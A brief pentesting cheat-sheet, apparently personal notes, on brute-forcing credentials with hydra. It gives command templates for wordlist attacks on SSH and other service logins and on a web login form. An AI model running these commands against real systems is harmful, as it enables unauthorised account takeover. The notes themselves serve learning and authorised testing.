🙃Credential Brute-Forcing

Mainly hydra for now

Based article: https://infinitelogins.com/2020/02/22/how-to-brute-force-websites-using-hydra/

Bruteforcing port credentials

  • hydra -l user -P wordlist ssh://ip:port (can replace ssh with other services like ftp, etc.)

Bruteforcing website logins

  • sudo hydra -l admin -P /usr/share/wordlists/rockyou.txt ip/domain http-post-form "/path/to/login:username=admin&password=^PASS^:Invalid Password!"

Last updated